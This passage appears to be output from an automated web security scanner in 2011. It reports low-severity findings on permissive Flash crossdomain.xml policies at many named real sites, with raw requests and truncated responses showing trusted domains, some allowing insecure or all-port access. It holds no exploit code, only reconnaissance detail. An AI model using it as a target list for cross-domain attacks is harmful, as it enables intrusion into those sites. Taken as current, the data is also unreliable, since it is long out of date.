HTTP/1.0 200 OK Server: Sun-Java-System-Web Content-Type: text/xml; charset=UTF-8 Last-Modified: Tue, 21 Jul 2009 14:44:48 GMT Content-Length: 230 ETag: "e6-4a65d460" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 14:20:09 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hi5.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hi5.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"414-1286911046000" Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT Content-Type: application/xml Content-Length: 414 Date: Sat, 02 Apr 2011 13:34:02 GMT Connection: keep-alive Set-Cookie: NSC_bqq-tfswfst-ofxvj <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.mysite.com --> <cross-domain-policy> <allow-access-from domain="*.hi5.com" /> <allow-access-from domain="hi5.com" /> <allow-access-from domain="x.mochiads.com" /> <allow-access-from domain="*.socialmoraygames.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.history.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.history.com |
HTTP/1.0 200 OK Server: Apache/2.2.11 (Unix) Last-Modified: Mon, 21 Mar 2011 16:37:50 GMT ETag: "1720927-d1-49f00bf96f380 Accept-Ranges: bytes Content-Length: 209 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:44:47 GMT Connection: close X-N: S <?xml version="1.0"?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*.h9story.com" /> <allow-access-from domain="*.history.com" /> </cross-domai ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hollywood.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hollywood.com |
HTTP/1.1 200 OK Content-Length: 354 Content-Type: text/xml Last-Modified: Thu, 22 Apr 2010 18:33:10 GMT Accept-Ranges: bytes ETag: "07739424ae2ca1:8d9" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:32:57 GMT Connection: close <?xml version="1.0" ?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*.hollywood.com" /> <allow-access-from domain="*.brightcove.com" /> <!-- f ...[SNIP]... <allow-access-from domain="*.cooliris.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hollywoodlife |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hollywoodlife.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Last-Modified: Mon, 12 Apr 2010 23:01:21 GMT Server: nginx/0.7.62 Content-Length: 267 Expires: Sat, 02 Apr 2011 13:54:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:54:08 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.vimg.net" /> <allow-access-from domain="*.hollywoodlife.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.homedepot.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.homedepot.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server/2.0.47.1 Last-Modified: Thu, 16 Oct 2008 20:46:36 GMT ETag: "1023-1c7-f1d96300" Accept-Ranges: bytes Content-Length: 455 Content-Type: text/xml X-Pad: avoid browser bug Cache-Control: max-age=37156 Date: Sat, 02 Apr 2011 13:24:42 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3 <allow-access-from domain="*.homedepot.com" /> <allow-access-from domain="homedepot.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hp.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hp.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:43:35 GMT Server: Apache Last-Modified: Mon, 17 May 2010 11:29:38 GMT ETag: "8a41ec80" Accept-Ranges: bytes Content-Length: 213 Cache-Control: max-age=7200 Expires: Sat, 02 Apr 2011 14:43:35 GMT Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.hp.com" /> </cross-dom ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hsn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hsn.com |
HTTP/1.1 200 OK Content-Length: 510 Content-Type: text/xml Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT Accept-Ranges: bytes ETag: "0c3ad376ee9cb1:101f" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA" X-Powered-By: ASP.NET Set-Cookie: TLTSID=AD33F804402E8 Set-Cookie: TLTHID=AD33F804402E8 Date: Sat, 02 Apr 2011 13:35:57 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.hsn.com" /> <allow-access-from domain="*.hsnlab.com" /> <allow-access-from domain="*.hsni.com" /> <allow-access-from domain="a1995.g.akamai.net"/> <allow-access-from domain="a1995.b.akamai.net"/> <allow-access-from domain="a248.e.akamai.net"/> <allow-access-from domain="*.clipsync.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.hulu.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.hulu.com |
HTTP/1.0 200 OK Last-Modified: Thu, 24 Mar 2011 16:34:41 GMT Server: nginx Content-Type: text/xml Content-Length: 347 Accept-Ranges: bytes Cache-Control: max-age=547174 Expires: Fri, 08 Apr 2011 20:37:25 GMT Date: Sat, 02 Apr 2011 12:37:51 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.hulu.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.tivo.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.yahoo.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ichotelsgroup |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ichotelsgroup.com |
HTTP/1.0 200 OK Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a Content-Type: text/xml P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http:/ Last-Modified: Fri, 09 May 2008 23:45:44 GMT ETag: "e5e5-10c-4824e228" Accept-Ranges: bytes Content-Length: 268 Expires: Sat, 02 Apr 2011 13:37:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 02 Apr 2011 13:37:25 GMT Connection: close Set-Cookie: TLTSID=588654C85D2E1 Set-Cookie: TLTUID=588654C85D2E1 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.intercontinental.com"/> <allow-access-from domain="*.ichotelsgroup.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ikea.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ikea.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Thu, 04 Nov 2010 08:01:26 GMT ETag: "cfc07-a11-908a4180" Accept-Ranges: bytes Content-Length: 2577 Content-Type: text/xml Cache-Control: public, max-age=1800 Date: Sat, 02 Apr 2011 13:41:55 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.ikea.com" /> <allow-access-from domain="*.ikea.be" /> <allow-access-from domain="*.ikea.cz" /> <allow-access-from domain="*.ikea.dk" /> <allow-access-from domain="*.ikea.de" /> <allow-access-from domain="*.ikea.es" /> <allow-access-from domain="*.ikea.gr" /> <allow-access-from domain="*.ikea.fr" /> <allow-access-from domain="*.ikea.is" /> <allow-access-from domain="*.ikea.com.cy" /> <allow-access-from domain="*.ikea.hu" /> <allow-access-from domain="*.ikea.nl" /> <allow-access-from domain="*.ikea.no" /> <allow-access-from domain="*.ikea.at" /> <allow-access-from domain="*.ikea.ru" /> <allow-access-from domain="*.ikea.pl" /> <allow-access-from domain="*.ikea.pt" /> <allow-access-from domain="*.ikea.ro" /> <allow-access-from domain="*.ikea.ch" /> <allow-access-from domain="*.ikea.sk" /> <allow-access-from domain="*.ikea.fi" /> <allow-access-from domain="*.ikea.se" /> <allow-access-from domain="*.ikea.ie" /> <allow-access-from domain="*.ikea.com.tr" /> <allow-access-from domain="*.ikea.co.uk" /> <allow-access-from domain="*.ikea.ca" /> <allow-access-from domain="*.ikea.cn" /> <allow-access-from domain="*.ikea.com.hk" /> <allow-access-from domain="*.ikea.jp" /> <allow-access-from domain="*.ikea.com.my" /> <allow-access-from domain="*.ikea.com.tw" /> <allow-access-from domain="*.ikea.com.sg" /> <allow-access-from domain="*.ikeainfo.com" /> <allow-access-from domain="*.ikeastampa.it" /> <allow-access-from domain="*.ikea-family.net" /> <allow-access-from domain="*.ikea-business.net" /> <allow-access-from domain="*.business.ikea.com" /> <allow-access-from domain="*.lebst-du-schon.com" /> <allow-access-from domain="*.ikeacz.cz" /> <allow-access-from domain="*.moovii.jp" /> <allow-access-from domain="*.prototipo.sweb.info" /> <allow-access-from domain="*.ikeadt.com" /> <allow-access-from domain="*.gimlet.se" /> <allow-access-from domain="*.kokokaka.com" /> <allow-access-from domain="*.weareyours.com" /> <allow-access-from domain="*.ikea-canada.com"/> <allow-access-from domain="*.novaloznice.cz" /> <allow-access-from domain="*.novaspalna.sk" /> <allow-access-from domain="*.ujhaloszoba.hu"/> <allow-access-from domain="*.cybercomhosting.com"/> <allow-access-from domain="*.rebenga.se"/> <allow-access-from domain="*.ikeagodjul.cz"/> <allow-access-from domain="*.ikeagodjul.sk"/> <allow-access-from domain="*.ikeagodjul.hu"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ilike.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ilike.com |
HTTP/1.1 200 OK Content-Type: text/xml P3P: policyref="http://www Date: Sat, 02 Apr 2011 12:13:14 GMT X-App: lv-app82-170:80 Accept-Ranges: bytes Last-Modified: Mon, 03 Jan 2011 23:38:16 GMT Content-Length: 1178 Connection: Keep-Alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.ilike.com --> <cross-domain-policy> <allow-access-from domain="*.ilike.com" /> ...[SNIP]... <allow-access-from domain="*.google.com" /> ...[SNIP]... <allow-access-from domain="*.gmodules.com" /> ...[SNIP]... <allow-access-from domain="*.facebook.com" /> ...[SNIP]... <allow-access-from domain="*.myspace.com" /> ...[SNIP]... <allow-access-from domain="*.icast.com" /> <allow-access-from domain="*.gcast.com" /> <allow-access-from domain="*.garageband.com" /> ...[SNIP]... <allow-access-from domain="*.fotodunk.com" /> <allow-access-from domain="local" /> <allow-access-from domain="localhost" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.imdb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.imdb.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:37:57 GMT Server: Server Last-Modified: Fri, 01 Apr 2011 05:36:11 GMT ETag: "20e-49fd4c99968c0" Accept-Ranges: bytes Content-Length: 526 Cache-Control: max-age=315360000 Expires: Tue, 30 Mar 2021 12:37:57 GMT nnCoection: close Content-Type: text/xml Vary: Accept-Encoding,User P3P: policyref="http://i.imdb Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.imdb.com" /> <allow-access-from domain="*.imdb.de" /> <allow-access-from domain="*.imdb.es" /> <allow-access-from domain="*.imdb.it" /> <allow-access-from domain="*.imdb.fr" /> <allow-access-from domain="*.imdb.pt" /> <allow-access-from domain="*.imdb.me" /> <allow-access-from domain="*.media-imdb.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.indiatimes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.indiatimes.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 10 May 2010 10:00:59 GMT ETag: "eeb0e4b027f0ca1:633" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=162641 Date: Sat, 02 Apr 2011 14:02:48 GMT Content-Length: 917 Connection: close <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*.indiatimes.com" secure="true" /> <allow-access-from domain="*.timesgroup.com" secure="true" /> <allow-access-from domain="*.timesofindia.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.economictimes.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.ethindi.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.etgujarati.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.idiva.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.itimes.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.hotklix.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.absoluteradio.co.in" secure="true" /> ...[SNIP]... <allow-access-from domain="*.absoluteradio.co.uk" secure="true" /> ...[SNIP]... <allow-access-from domain="*.indiatimes.co.in" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cooliris.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.infoplease.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.infoplease.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:24 GMT Server: Apache Set-Cookie: Apache=173.193.214.243 Last-Modified: Thu, 28 Oct 2010 21:07:40 GMT ETag: "1cd-493b3bb70bf00" Accept-Ranges: bytes Content-Length: 461 Cache-Control: max-age=0 Expires: Sat, 02 Apr 2011 13:37:24 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.infoplease.com" /> <allow-ac ...[SNIP]... <allow-access-from domain="*.infoplease.info" /> <allow-access-from domain="i.infopls.com" /> <allow-access-from domain="*.familyeducation.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.intel.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.intel.com |
HTTP/1.0 200 OK Content-Length: 290 Content-Type: text/xml Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT Accept-Ranges: bytes ETag: "78bab694ff15c61:431f" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sat, 02 Apr 2011 14:04:59 GMT Connection: close ...<?xml version="1.0" encoding="UTF-8" ?> <cross-domain-policy> <allow-access-from domain="*.spillinova.com" /> <allow-access-from domain="*.intel.com" /> <allow-access-from domain="*.intel.com/cd/" /> <allow-access-from domain = "intel.speedera.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.intuit.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.intuit.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:41 GMT Server: Apache Last-Modified: Mon, 28 Mar 2011 05:24:24 GMT Accept-Ranges: bytes Content-Length: 410 Cache-Control: max-age=604800 Expires: Sat, 09 Apr 2011 13:39:41 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.intuit.com" /> <allow-access-from domain="*.intuit.com" to-ports="*" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.ioffer.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ioffer.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:36:04 GMT Server: PWS/1.7.1.5 X-Px: ms jfk-agg-n68 ( jfk-agg-n69), ms jfk-agg-n69 ( sjc-ag1-n2), ms sjc-ag1-n2 ( origin) Cache-Control: private Content-Length: 214 Content-Type: text/xml Last-Modified: Sat, 25 Apr 2009 21:28:14 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ioffer.com" /> </cross-d ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.istockphoto |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.istockphoto.com |
HTTP/1.0 200 OK Content-Type: text/x-cross-domain Server: BigIP Content-Length: 286 Date: Sat, 02 Apr 2011 14:16:11 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*.istockphoto.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.itt-tech.edu |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.itt-tech.edu |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:29:07 GMT Server: Apache/2.0.55 (Unix) JRun/4.0 Last-Modified: Thu, 25 Jun 2009 15:28:29 GMT ETag: "9974-100-e02f6140" Accept-Ranges: bytes Content-Length: 256 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ittesi.com" /> <allow-access-from domain="*.itt-tech.edu" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.iwin.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.iwin.com |
HTTP/1.1 200 OK ETag: W/"219-1296818118000" Last-Modified: Fri, 04 Feb 2011 11:15:18 GMT Content-Type: application/xml Server: Apache Content-Length: 219 Date: Sat, 02 Apr 2011 13:42:08 GMT X-Varnish: 931872643 Age: 0 Via: 1.1 varnish Connection: close <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*.iwin.com" /> <allow-http-request </cro ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.jtv.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.jtv.com |
HTTP/1.0 200 OK Server: Demandware eCommerce Server Cache-Control: public;max-age=54515 Expires: Sun, 03 Apr 2011 05:28:27 GMT Last-Modified: Thu, 31 Mar 2011 17:58:19 GMT Content-Type: application/xml Date: Sat, 02 Apr 2011 14:19:52 GMT Content-Length: 332 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="demandware.edgesuite.net" /> <allow-access-from domain="*.jtv.com" /> <allow-access-from domain="*.jewelrytelevision.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.justin.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.justin.tv |
HTTP/1.0 200 OK Server: nginx Content-Type: text/xml Last-Modified: Fri, 01 Apr 2011 23:54:55 GMT Date: Sat, 02 Apr 2011 13:33:28 GMT Content-Length: 798 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.myspacecdn.com" /> <allow-access-from domain="*.myspace.com" /> <allow-access-from domain="*.justin.tv" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.staging.justin.tv" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="localhost" to-ports="*" /> ...[SNIP]... <allow-access-from domain="bitcast-d.bitgravity.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kaboose.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kaboose.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:43 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9 Last-Modified: Tue, 17 Jun 2008 20:31:23 GMT ETag: "f963c-324-44fe2a0a1bcc0" Accept-Ranges: bytes Content-Length: 804 Keep-Alive: timeout=5, max=79 Connection: close Content-Type: application/xml X-UA-COMPATIBLE: IE=EmulateIE7 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.kaboose.com" /> <allow-access-from domain="funschool.kaboose.com" /> <allow-access-from domain="*.kaboose.ca" /> <allow-access-from domain="*.kidsdomain.com" /> <allow-access-from domain="*.funschool.com" /> <allow-access-from domain="*.zeeks.com" /> <allow-access-from domain="*.zeeks.ca" /> <allow-access-from domain="games.zeeks.com" /> <allow-access-from domain="*.babyzone.com"/> <allow-access-from domain="*.bounty.com"/> <allow-access-from domain="games.zeeks.ca" /> <allow-access-from domain="*.kaboosenetwork.com" /> <allow-access-from domain="*.birthdayinabox.com" /> <allow-access-from domain="*.bubbleshare.com" /> <allow-access-from domain="*.pointroll.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kbb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kbb.com |
HTTP/1.1 200 OK Cache-Control: max-age=864000 Content-Type: text/xml Last-Modified: Wed, 23 Mar 2011 15:13:32 GMT Accept-Ranges: bytes ETag: "0f629df6ce9cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:25:24 GMT Connection: close Content-Length: 217 Set-Cookie: BIGipServerpool_kbb.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.brightcove.com" /> </cro ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kenexa.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kenexa.com |
HTTP/1.1 200 OK Content-Length: 324 Content-Type: text/xml Last-Modified: Thu, 16 Oct 2008 16:15:07 GMT Accept-Ranges: bytes ETag: "a259d75aaa2fc91:3be" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:20:08 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.tommyweir.com" /> <allow-access-from domain="*.ceoshift.com" /> <allow-access-from domain="*.theceoshift.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.king.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.king.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:55:44 GMT Server: Apache Expires: Sat, 02 Apr 2011 14:05:44 GMT Content-Length: 9685 Content-Type: text/xml; charset=iso-8859-1 Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.king.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.midasplayer.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.royalgames.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="cash-games.gmx.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="cash.games.web.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="de.midas.games.yahoo.net" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="esv.rtl.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="esv.rtl.midasplayer.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="fr.midas.games.yahoo.net" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="games.blip.se" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="games.firstream.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="images.mygame.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.alice.aol.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.at.aol.de " secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.games.co.uk" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.gamesgames.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.it.msn.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.juegos.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="midasplayer.aol.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="midasplayer.onet.pl" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="midasplayer.tiscali.it" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="midasplayer.wanadoo.nl" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="pottipelit.pelikone.fi" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="pottipelit.taukopelit.fi" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="prosieben.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="prosieben.midasplayer.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rtl.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rtl.midasplayer.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rtl2.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="rtl2.midasplayer.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="sat1.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="sat1.midasplayer.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="spelhallen.msn.se" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="spiele.wunderweib.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="spray.midasplayer.se" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="turnier.freenet.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="turnier.tvmovie.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="uk.midas.games.yahoo.net" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.blipgame.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.king-spiele.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.king.de" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.mygame.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.play22.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.royalgames-online.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.royalgames.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.skillgames.co.uk" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.spelduel.nl" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="i1.midasplayer.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="king.pantherssl.com" secure="false" to-ports="*" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kmart.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kmart.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Wed, 23 Mar 2011 19:03:42 GMT Content-Type: text/xml Date: Sat, 02 Apr 2011 13:28:09 GMT Content-Length: 2829 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.sears.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.kenmore.com"/> <allow-access-from domain="*.media.richrelevance.com"/> <allow-access-from domain="*.recs.richrelevance.com"/> <allow-access-from domain="*.ecircular.richrelevance <allow-access-from domain="*.staging.richrelevance <allow-access-from domain="*.ecircular-staging <allow-access-from domain="*.ecircular-staging2 <allow-access-from domain="*.demo.richrelevance.com"/> <allow-access-from domain="*.integration.richre <allow-access-from domain="*.rp.richrelevance.com"/> <allow-access-from domain="*.shc.richrelevance.com"/> <allow-access-from domain="*.shc-staging.richre <allow-access-from domain="*.shc-qa.richrelevance <allow-access-from domain="*.allurent.net" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.fuelindustries.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cmycasa.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.fluid.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.cerosmedia.com" 